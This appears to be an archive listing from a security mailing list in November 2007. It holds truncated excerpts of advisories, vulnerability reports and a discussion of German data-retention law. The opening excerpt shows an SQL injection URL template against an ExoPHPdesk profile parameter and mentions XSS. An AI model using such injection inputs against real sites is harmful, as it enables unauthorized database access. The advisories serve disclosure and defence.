ExoPHPdesk user profile XSS / profile SQL injection
http://exoscripts.com/exohelpdesk
You can inject script code into the website area where you create profile.
Cookies are in place making an XSS more than possible.
http://example.com/helpdesk/index.php?fn=profile&s=&user=admin' sql here
S
===
Ubuntu Security Notice USN-541-1 November 13, 2007
emacs22 vulnerability
CVE-2007-5795
===
A security issue affects the following Ubuntu releases:
Ubuntu 7.10
This adviso
Florian Echtler wrote:
> As a native German speaker, allow me to clarify: with respect to IP
> communication, the law mandates saving the following information for 6
> months:
>
> - which customer was assigned which IP for what timespan
> - sender mail address, receiver mail address and sender IP
On Tue, 13 Nov 2007 13:07:02 PST, johan beisser said:
> Actually, that's not really part of the issue. The logs don't contain
> context, just who/where/when. While encryption will prevent (one
> hopes) the capability of recovering context, who you talked to is not
> kept private or otherwise
On Nov 13, 2007, at 12:39 PM, Paul Wouters wrote:
Instead of creating noise, one should fix the problem of sending out
plaintext email, and encourage people to use email encryption such as
Enigma for Thunderbird. Encrypt IM conversations with OTR, and via
other ways pro-actively protect ones o
On Nov 11, 2007, at 1:26 PM, Duncan Simpson wrote:
The signal-to-noise logic probably does work, but I am not sure the
legal
angle does. If you were *deliberately* ran the software that acidently
downloaded that kiddie porn the suggested angle might not work.
That's been an ongoing question
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:217
http://www.mandriva.com/security/
___
On Tue, 13 Nov 2007, Florian Echtler wrote:
As a native German speaker, allow me to clarify: with respect to IP
communication, the law mandates saving the following information for 6
months:
- which customer was assigned which IP for what timespan
- sender mail address, receiver mail address an
iDefense Security Advisory 11.12.07
http://labs.idefense.com/intelligence/vulnerabilities/
Nov 12, 2007
I. BACKGROUND
The Novell Client software provides a workstation with access to Novell
NetWare networks as well as Novell Open Enterprise Server (OES)
services. Novell Clients can access the ful
===
Ubuntu Security Notice USN-540-1 November 13, 2007
flac vulnerability
CVE-2007-4619
===
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
I know this is obvious to everyone on bugtraq, but nobody seems to that told
P.S.Ziegler yet. (He might or might not be aware of these facts).
If the report is right and logs recoriding you connecting and obtaining an IP
address are a concern then you should be terrified already. I suspect that
> If I read the law correctly, it requires retention of "what IP
> connected to another IP" and "which phone number called where." It
> doesn't bother retaining the URL called (my German is rusty, so I may
> be a little off in my interpretation). Connecting to a random IP on a
> random open
Hey all,
After investigating 11g the other day I came across an interesting issue.
During the installation of Oracle 11g and 10g all accounts, including the
SYS and SYSTEM accounts, have their default passwords and only at the end of
the install are the passwords changed. This means that there is a
Hi,
Am Samstag, 10. November 2007 19:53 schrieb Jan Newger:
>
> NO! This is totally WRONG! The only thing which is logged, in the case
> of internet connectivity, is your IP you got from the ISP. Not even
> connections are logged! This is important to understand since many
> people are misinformed
Application: PHP <= 5.2.5
Web Site: http://php.net
Platform: Unix
Bug: Multiple Denial of service
fonction: Gettext Lib multiple Denial of service
special condition: Default php-memory-limit
Tested on : Debian 4.0 , Ubuntu , Freebsd with Suhosin 0.9.6.2
--
Application: PHP <= 5.2.5
Web Site: http://php.net
Platform: unix
Bug: Denial of service
fonction: stream_wrapper_register()
special condition: default php-memory-limit
---
1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credit
After 6 months - fix available for Microsoft DNS cache poisoning
attack
On April this year I discovered a new vulnerability that enables
DNS cache poisoning attack against the Windows DNS server. Today
(November 13th, 2007) - six and a half months after being informed
- Microsoft released a fix f
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:216
http://www.mandriva.com/security/
___
Actually, you've never emailed us.
HTML is stripped from posts, with the exception of admin allowed tags. The
username XSS issue is already being dealt with in the 6.1 release.
Install.php won't do anything, unless you know the username/password/db name
for the system. Admins are told to re
ATC-08 Call For Papers
The 5th International Conference on Autonomic and Trusted Computing, Oslo,
Norway, June 23-25 2008
"Bring Safe, Self-x and Organic Computing Systems into Reality"
Topics include but are not limited to the following:
- Trust Models and Specifications
Models and s
=
INTERNET SECURITY AUDITORS ALERT 2006-004
- Original release date: April 18, 2006
- Last revised: November 13, 2007
- Discovered by: Jesus Olmos Gonzalez
- Severity: 1/5
=
I. VULNERABILITY
---
21 matches
Mail list logo
